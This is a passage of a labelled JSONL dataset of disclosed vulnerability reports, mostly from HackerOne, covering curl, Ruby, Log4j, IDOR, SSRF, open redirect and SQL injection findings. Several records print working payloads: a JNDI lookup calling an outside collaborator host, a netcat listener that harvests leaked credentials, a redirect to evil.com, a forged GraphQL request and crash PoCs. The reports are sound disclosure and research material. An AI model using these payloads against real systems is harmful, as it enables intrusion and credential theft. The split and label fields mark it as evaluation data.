`--dbs` will back to us with the databases\n\n```jsx\navailable databases [13]:\n[] ███\n[] ██████mobile\n[] GET\n[] information_schema\n[] LEAM\n[] leat\n[] LEV\n[] mysql\n[] performance_schema\n[] SET\n[] test\n[] testadmin\n[*] testusers\n```\n\n## Impact\n\nattacker is able to get the database", "source": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "e3354371765b67d0b2d5", "text": "[Business Logic Errors] CVE-2022-32208: FTP-KRB bad message verification\n\nWhen curl does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client.\n\n## Impact\n\nLoss of integrity of FTP-KRB transfers", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "595833d3e482715f0f46", "text": "[Phishing] Address Bar Spoofing on TOR Browser\n\nHi TOR team,\n\nI would like to report a security bug in your browser:\n\nStep 1: Goto http://www.ոokia.com/(http://jsbin.com/wuyikedaxi/1/edit?html,output)\nStep 2: Observe that address bar points to http://www.ոokia.com/ which actually to be pointing to http://xn--okia-zgf.com, however browser displays www.ոokia.com/\n\nActual results:\n\nAddress bar points to a spoofed domain http://www.ոokia.com/. Address bar fails to parse character \"ո\"(U+0578 Armenian Small Letter). Several other characters from Armenian family lead to the same effect. \n\nExpected results:\n\nTORbrowser should have resolved the domain to real http://xn--okia-zgf.com. On chrome, internet explorer and firefox it resolves to xn--okia-zgf.com.", "source": "hackerone", "timestamp": "2023-01-02", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8e54e3d0e7bafbb20759", "text": "[Double Free] CVE-2022-28738: Double free in Regexp compilation\n\nDue to a bug in the Regexp compilation process, creating a Regexp object with a crafted source string could cause the same memory to be freed twice. This is known as a “double free” vulnerability. Note that, in general, it is considered unsafe to create and use a Regexp object generated from untrusted input. In this case, however, following a comprehensive assessment, we treat this issue as a vulnerability.\n\npoc:\n```\nruby -e '/(\\\\x15\\\\x17\\\\xE2\\\\xF5\\\\xF5\\\\xF5\\\\xC2\\\\x04\\\\x08J,\\\\x00\\\\xD0\\\\x00\\\\x00(?(1)\\\\xF5\\\\xF5\\\\xF5\\\\xD7\\\\xF5\\\\xF5\\\\xF5\\\\x87\\\\x04\\\\xFA555\\\\xBEJ,\\\\x18FF\\\\x15\\\\xFF|\\\\x03\\\\x01\\\\x00\\\\x01\\\\x00\\\\x00\\\\x8F\\r|)44\\\\x00\\\\x8F\\r|)+/m'\n```\n\n## Impact\n\nmay lead to a RCE attack cooperate with marshal.load", "source": "hackerone", "timestamp": "2022-05-28", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "601508100ab8c578ec36", "text": "[Insecure Direct Object Reference (IDOR)] Insecure Direct Object Reference (IDOR) - Delete Campaigns\n\n**Summary:**\nHi Team, \n\nI think I can delete any Campaigns based on campaign_id\n\n\n### Steps To Reproduce\n\nFollow the POST request below\n\n````\nPOST /graphql HTTP/2\nHost: hackerone.com\nCookie: yourcookie\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://hackerone.com/organizations/opensea_demo/campaigns/242/edit\nContent-Type: application/json\nX-Csrf-Token: ███\nX-Product-Area: campaigns\nX-Product-Feature: edit\nX-Datadog-Origin: rum\nX-Datadog-Parent-Id: 9027318766950450042\nX-Datadog-Sampling-Priority: 1\nX-Datadog-Trace-Id: 87799383677632658\nContent-Length: 851\nOrigin: https://hackerone.com\nDnt: 1\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\n{\"operationName\":\"UpdateCampaign\",\"variables\":{\"product_area\":\"campaigns\",\"product_feature\":\"edit\",\"input\":{\"campaign_id\":\"Z2lkOi8vaGFja2Vyb25lL0NhbXBhaWduLzI0NA==\",\"team_id\":\"Z2lkOi8vaGFja2Vyb25lL0VuZ2FnZW1lbnRzOjpCdWdCb3VudHlQcm9ncmFtLzU3MzI4\",\"bounty_table_row_id\":\"Z2lkOi8vaGFja2Vyb25lL0JvdW50eVRhYmxlUm93LzEwODM2\",\"start_date\":\"2023-05-05T09:00:00Z\",\"end_date\":\"2023-05-08T05:00:00Z\",\"critical\":3,\"high\":2,\"medium\":1.5,\"low\":1.5,\"structured_scope_ids\":[],\"researchers_information\":\"ccccccccccccccc\"}},\"query\":\"mutation UpdateCampaign($input: UpdateCampaignInput!) {\\n updateCampaign(input: $input) {\\n was_successful\\n errors {\\n edges {\\n node {\\n id\\n type\\n field\\n message\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n\n````\n\nDecode base64 of campaign_id to get **gid://hackerone/Campaign/244**\n\nIncrease or decrease the number after Campaign and re-encode it with base64\n\nAt the campaign_id parameter in the request change it to another program's ongoing campaign_id parameter.\n\nThen send Campaign request of any program to be deleted.\n\n## Impact\n\nCan delete all Campaign on hackerone or any program", "source": "hackerone", "timestamp": "2023-05-03", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "bbf6a31a3888ff391841", "text": "[Server-Side Request Forgery (SSRF)] Host header injection that bypassed protection and allowed accessing multiple subdomains\n\n> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report!\n\n**Name of Vulnerability:*Host header injection/SSRF\n**Areas affected:** [App/ Website + URL/Location] https://www.urbancompany.com and it allowed accessing otherwise inaccessible subdomains https://av.urbancompany.com , https://ims.urbancompany.com , https://mesh.urbancompany.com\n**User Details:** [Registered Email and Registered Mobile Number used for the purpose of signing up an account with Urbanclap] N/A\n**Summary:** [add summary of the vulnerability] Ability to access certain subdomains (which should be presumably only for internal/trusted sources ) through host header manipulation.\nto be able to access.\n**Description:** [add more details about this vulnerability]\n\n## Steps To Reproduce:\n\n(Add details for how we can reproduce the issue through manual testing only)\n\n 1. Go to any of the three subdomains using any browser and after a while you'll see this:\n\n{F2046658}\n\n\n 2. Using burp and Match and Replace rule:\n\n{F2046655}\n\n 3. Now using burp chromium go to https://www.urbancompany.com , \nand you'll see the following for the Host: mesh.urbancompany.com:\n\n{F2046657}\n\n\nand for Host: av.urbancompany.com:\n\n{F2046651}\n\nand for Host: ims.urbancompany.com:\n\n{F2046654}\n\n\nSome interesting endpoints:\nFor av.urbancompany.com:\n\n{F2046652}\n\n\n{F2046653}\n\n\n\nFor mesh.urbancompany.com, potentially means ability to access user files, but because I don't know any of the files I was unable to confirm if it would ask for some authorization upon request to the existing file:\n\n{F2046659}\n\nThis endpoint looks interesting, but for some reason it doesn't actually initiate any uploading when I tried to upload files with mentioned extension:\n\n{F2046656}\n\n\nAdditional note:\nAll three subdomains resolve to the same ip address, which implies that if you have other subdomains associated with this ip address those subdomains are probably affected by this bypass as well.\n\nThank you for looking into this, and please let me know if you have any questions and/or if you need me to do some more testing, like fuzzing all the found endpoints to determine if there are some interesting bugs there.\n\nSincerely,\n@musashi42\n\n## Supporting Material/References:\nAttached are the screenshots.\n * List any additional material (e.g. screenshots, logs, etc.)\n\n## Impact\n\nImpact is dependent on whether ability to access the subdomains in question is considered as a bypass and if any of the disclosed information (especially various accessible js files) shouldn't be accessible in this way, in addition if there are more sensitive endpoints that I simply didn't find with my limited wordlists but larger wordlists would find. In addition, there's also a question if more interesting subdomains are associated with the same ip address as the three that I mentioned in the report and if those subdomains are even more interesting for the attacker because this bypass should work on any subdomain that's been associated with the ip address of the three mentioned subdomains.", "source": "hackerone", "timestamp": "2022-12-21", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "39c3032cbc0ce1f98734", "text": "Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2023-09-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2fea3ce8f3647a8a28e7", "text": "[External Control of File Name or Path] CVE-2023-38546: cookie injection with none file\n\nWhen `curl_easy_duphandle()` is used to duplicate an easy handle it is possible to inject cookies \ninto that duplicated handle if a file `none` exists in the current working directory.\n\n## PoC / Steps to reproduce:\n1. Open 2 terminals\n1. compile F2699218\n1. in terminal 1: \n `nc -l -p 8888 127.0.0.1`\n1. in terminal 2: \n\t* `echo -e \"127.0.0.1\\tTRUE\\t/\\tFALSE\\t0\\tname\\tvalue\" > none`\n\t* `/path/to/poc_cookieinj` \n(`poc_cookieinj` does not have to be in the same directory as the file `none`)\n\n## Supporting Material/References:\n\nThe flaw is in `Curl_cookie_init()`\n```\nif(!inc) {\n /* we didn't get a struct, create one */\n c = calloc(1, sizeof(struct CookieInfo));\n if(!c)\n return NULL; /* failed to get memory */\n c->filename = strdup(file?file:\"none\"); /* copy the name just in case */\n if(!c->filename)\n goto fail; /* failed to get memory */\n```\n\nand in `curl_easy_duphandle()` the injection happens\n```\nif(data->cookies) {\n /* If cookies are enabled in the parent handle, we enable them\n in the clone as well! */\n outcurl->cookies = Curl_cookie_init(data,\n data->cookies->filename,\n outcurl->cookies,\n data->set.cookiesession);\n if(!outcurl->cookies)\n goto fail;\n }\n```\n\n## Impact\n\ncookies injection into an http request", "source": "hackerone", "timestamp": "2023-10-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a838b493e3a84167872d", "text": "MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2022-10-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "654804e1ab0b78314b77", "text": "[Stack Overflow] CVE-2022-35260: .netrc parser out-of-bounds access\n\nOriginal Report:https://hackerone.com/reports/1721098\n\n## Impact\n\nIf a malicious user can provide a custom netrc file to an application or otherwise affect its contents, this flaw could be used as denial-of-service.", "source": "hackerone", "timestamp": "2022-12-03", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3b9f4177655ef562b0b5", "text": "[Unknown] [CVE-2023-27539] Possible Denial of Service Vulnerability in Rack’s header parsing\n\nI made a report and patch at https://hackerone.com/reports/1887373 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466\n\n> There is a denial of service vulnerability in the header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27539.\n\n## Impact\n\n> Carefully crafted input can cause header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse headers using Rack (virtually all Rails applications) are impacted.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "1f4f9cd558eb601d6fbd", "text": "[Information Disclosure] jira discloser information\n\nThe ticket raising system used by informatica suffers from an informational vulnerability where in an attacker can view certain details about open bugs or project information of informatica. Details include names and potentially and ticket names which an unauthorized personnel can view without login that can be very useful to an attacker.\n\nendpoints:\n\nhttps://infajira.informatica.com/secure/QueryComponent!Default.jspa\n\n## Impact\n\nattacker miss use this information", "source": "hackerone", "timestamp": "2022-10-03", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "34abd4d980fa47a5d6bc", "text": "[Use After Free] CVE-2022-43552: HTTP Proxy deny use-after-free\n\nIssue(s) reported by Trail of Bits. This is either one or two issues.\n\n## Summary:\n\n`./src/curl 0 -x0:80 telnet:/[j-u][j-u]//0 -m 01`\n`./src/curl 0 -x0:80 smb:/[j-u][j-u]//0 -m 01`\n\nBoth command line ends up having libcurl access and use already freed heap-memory. For read and write.\n\n## Steps To Reproduce:\n\nSee above, run with valgrind for full report.\n\nI have a local HTTP server on localhost host port 80 that will send back a 502 on the CONNECT requests curl issues to it for these protocols.\n\n## Supporting Material/References:\n\nSee logs.\n\n## Impact\n\nUse after free stuff.", "source": "hackerone", "timestamp": "2022-12-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bdf4e8238a8edaebb2d2", "text": "[Insufficiently Protected Credentials] CVE-2022-27774: Credential leak on redirect\n\n## Summary:\ncurl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.\n\n## Steps To Reproduce:\n\n 1. Configure for example Apache2 on `firstsite.tld` to perform redirect with mod_rewrite:\n ```\n RewriteCond %{HTTP_USER_AGENT} \"^curl/\"\n RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]\n ```\n 2. Capture credentials at `secondsite.tld` for example with:\n ```\n while true; do echo -e \"220 pocftp\\n331 plz\\n530 bye\" | nc -v -l -p 9999; done\n ```\n 3. `curl -L --user foo https://firstsite.tld/redirectpoc`\n 4. The entered password is visible in the fake FTP server:\n```\nListening on 0.0.0.0 9999\nConnection received on somehost someport\nUSER foo\nPASS secretpassword\n```\n\nThere are several issues here:\n1. The credentials are sent to a completely different host than the original host (`firstsite.tld` vs `secondsite.tld`). This is definitely not what the user could expect, considering the documentation says:\n> When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this.\n2. The redirect crosses from secure context (HTTPS) to insecure one (FTP). That is the credentials are unexpectedly sent over insecure channels even when the URL specified is using HTTPS.\n\nIn addition, TLS SRP user credentials (`CURLOPT_TLSAUTH_USERNAME` and `CURLOPT_TLSAUTH_PASSWORD`) are also leaked on redirects.\n\n## Impact\n\nLeak of confidential information (user credentials).", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "55a573939493b9c29bc2", "text": "[Server-Side Request Forgery (SSRF)] CVE-2021-40438 on cp-eu2.acronis.com\n\nHi team\n\n## Summary\nCVE-2021-40438 on cp-eu2.acronis.com\n\n## Steps To Reproduce\n\n `\nhttps://cp-eu2.acronis.com?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "source": "hackerone", "timestamp": "2022-07-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "64ce0f2a8dc811bd3767", "text": "[Open Redirect] [https://█████████/]&&[https://█████████/] Open Redirection\n\n***Summary***\n\nHi Team,\n\nAn attacker can redirect vicitm on an external website using ``https://████/account/login`` endpoint because ``next`` parameter is not being validated properly.\n\n***Affected URL***\n\n`https://███/account/login/?next=///////////////////////////evil.com`\n\n***Steps to Reproduce***\n\n1) Go https://████/account/login/?next=%2Fapp%2F .\n2) Add this payload `////////////////////////////evil.com` to the `?next=` parameter .\n3) Registeran account in the normal way .\n4) You will be redirected to evil.com website .\n\n***POC***\n{F467696}\n\n***References***\n\n* https://hackerone.com/reports/347645\n* https://hackerone.com/reports/125003\n* https://hackerone.com/reports/411723\n\n## Impact\n\n* Open redirects allow a malicious attacker to redirect people unknowingly to a malicious\nwebsite .\n* Simplifies phishing attacks .", "source": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d2e035b308e1cdbec441", "text": "[Business Logic Errors] CVE-2022-27782: TLS and SSH connection too eager reuse\n\n## Summary:\nCurl fails to consider some security related options when reusing TLS connections. For example:\n\n# TLS\nCURLOPT_SSL_OPTIONS\nCURLOPT_PROXY_SSL_OPTIONS\nCURLOPT_CRLFILE\nCURLOPT_PROXY_CRLFILE\nCURLOPT_TLSAUTH_TYPE\nCURLOPT_TLSAUTH_USERNAME\nCURLOPT_TLSAUTH_PASSWORD\nCURLOPT_PROXY_TLSAUTH_TYPE\nCURLOPT_PROXY_TLSAUTH_USERNAME\nCURLOPT_PROXY_TLSAUTH_PASSWORD\n\nAs a result for example TLS connection with lower security (`CURLSSLOPT_ALLOW_BEAST`,` CURLSSLOPT_NO_REVOKE`) connection reused when it should no longer be. Also connection that has been authenticated perviously with `CURLSSLOPT_AUTO_CLIENT_CERT` might be reused for connections that should not be.\n\n# SSH\nCURLOPT_SSH_PUBLIC_KEYFILE\nCURLOPT_SSH_PRIVATE_KEYFILE\n\nIf the attacker knows the vulnerable application used SSH key authentication towards specific host with certain username and protocol they can then perform actions to the same host afterwards and abuse the connection reuse.\n\n## Impact\n\n- Wrong identity (client certificate) or TLS security options being used for subsequent connections to the same hosts.\n- Previously authenticated SSH sessions (SCP/SFTP) reuse.", "source": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3849225a349cc266da4d", "text": "[Unknown] Information disclosure ( Google Sales Channel )\n\nIn the review on apps.shopify.com the Google sales channel has a review of 5407 but the actual number of shopify stores that use the Google channel I believe is more than that number so I think this vulnerability can have an impact on many shopify stores and here I found a vulnerability where attackers can exploit every shopify store that has a Google Sales channel even though the store is in Password protection\n\n1. Install google channel at your-store.myshopify.com\n2. Enable password protection at your-store.myshopify.com\n3. Add new product in shopify store\n4. Now go to this link : google-shopping.shopifycloud.com/shopify/products?shop=your-store.myshopify.com&id=PRODUCT ID&locale=en\nChange PRODUCT ID with your shopify product id\n5. Now in the response you will see information disclosure in the form of data-channel-id and data-user-email\n\n```\ndata-channel-id=\"70715703461\"\ndata-user-email=\"VICTIMEMAIL@gmail.com\"\n```\n\nEven though the shopify store which is in a password protected state is very private, but in this vulnerability the attacker can still find out sensitive information from the shopify store which is in a password protected state.\nStores that do not have a password protected are easier to exploit because attackers can get the product id of the victim's store\n\n## Impact\n\nVulnerabilities that allow attackers to get sensitive information from victim stores", "source": "hackerone", "timestamp": "2022-07-17", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a86a2e49ae9baba7cedc", "text": "[Command Injection - Generic] LOGJ4 VUlnerability [HtUS]\n\n**Description:**\nHi team,\n\nlog4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable\n\n**Impact**\n\nRCE\n\n**System Host(s)**\n\n██████\n\n**Affected Product(s) and Version(s)**\n\n**CVE Numbers**\n\nCVE-2021-44228\n\n**Steps to Reproduce**\n\n1. Go to this url => https://███��█/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n2. paste the poc code on parameter\n3. Then burp collaborator received reverse ping back\nPhotos below\n\n**POC CODE**\n${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n\n**Suggested Mitigation/Remediation Actions**\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Impact\n\nSuccessful attack leads Arbitary Code Execution on the application", "source": "hackerone", "timestamp": "2022-11-18", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "821e82c35aa6a669bfd4", "text": "[Double Free] CVE-2023-27537: HSTS double-free\n\n## Summary:\nWhen processing HSTS with multi-threading, double-free or UAF may occur due to lack of exclusion control.\nHSTS entries disappear when they expire or when \"max-age=0\" is received.\nIn this case, the offending entry is removed from the internal memory list, freeing memory but not exclusivity control.\nTherefore, depending on the timing, other threads may perform the operation, resulting in double-free or UAF.\n\n`lib/hsts.c` in the function `Curl_hsts_parse` on lines 213-221\n```\n if(!expires) {\n /* remove the entry if present verbatim (without subdomain match) */\n sts = Curl_hsts(h, hostname, FALSE);\n if(sts) {\n Curl_llist_remove(&h->list, &sts->node, NULL);\n hsts_free(sts);\n }\n return CURLE_OK;\n }\n```\n\nIf multiple threads process `hsts_free(sts);` at the same time, it becomes double-free.\nAnother problem is that UAF occurs when other threads access entries.\n\nLines 270-275 have a similar problem.\n\n## Steps To Reproduce:\n\n 1. [Prepare the following php.]\n```\n\n#define HAVE_STRUCT_TIMESPEC // [Add] \n#include \n#include \n\n#define NUMT 100\n\nconst char* const url = \"https://test.local/poc.php\";\n\npthread_mutex_t lock[9];\n\nstatic void lock_cb(CURL* handle, curl_lock_data data,\n curl_lock_access access, void* userptr)\n{\n pthread_mutex_lock(&lock[data]); /* uses a global lock array */\n}\n\nstatic void unlock_cb(CURL* handle, curl_lock_data data,\n void* userptr)\n{\n pthread_mutex_unlock(&lock[data]); /* uses a global lock array */\n}\n\nstatic void* pull_one_url(void* shobject)\n{\n CURL* curl;\n\n for (int i = 0; i < 100; i++) {\n curl = curl_easy_init();\n curl_easy_setopt(curl, CURLOPT_URL, url);\n curl_easy_setopt(curl, CURLOPT_HSTS, \"c:\\\\home\\\\hsts.txt\");\n curl_easy_setopt(curl, CURLOPT_SHARE, shobject);\n curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);\n curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);\n curl_easy_perform(curl); /* ignores error */\n curl_easy_cleanup(curl);\n }\n\n return NULL;\n}\n\nint main(int argc, char** argv)\n{\n pthread_t tid[NUMT] = {0};\n int i;\n\n for(i = 0;i<=9;i++)\n pthread_mutex_init(&lock[i], NULL);\n \n /* Must initialize libcurl before any threads are started */\n curl_global_init(CURL_GLOBAL_ALL);\n CURLSH* shobject = curl_share_init();\n curl_share_setopt(shobject, CURLSHOPT_SHARE, CURL_LOCK_DATA_HSTS);\n curl_share_setopt(shobject, CURLSHOPT_LOCKFUNC, lock_cb);\n curl_share_setopt(shobject, CURLSHOPT_UNLOCKFUNC, unlock_cb);\n for (i = 0; i < NUMT; i++) {\n int error = pthread_create(&tid[i],\n NULL, /* default attributes please */\n pull_one_url,\n (void*)shobject);\n if (0 != error)\n fprintf(stderr, \"Couldn't run thread number %d, errno %d\\n\", i, error);\n else\n fprintf(stderr, \"Thread %d, gets %s\\n\", i, url);\n }\n\n /* now wait for all threads to terminate */\n for (i = 0; i < NUMT; i++) {\n pthread_join(tid[i], NULL);\n fprintf(stderr, \"Thread %d terminated\\n\", i);\n }\n curl_share_cleanup(shobject);\n curl_global_cleanup();\n return 0;\n}\n\n```\nThe source was referred to under docs/examples.\n\nSupplement.\nURL is https://test.local/poc.php.\nphp that randomly memorizes and deletes HSTS entries.\nIt's hard to reproduce if it's random, but I've confirmed that the problem will occur.\nI attach an image of when the UAF happened(I tried in debug build).\nThe number of threads and the number of loops are increased in order to raise the possibility that the phenomenon will 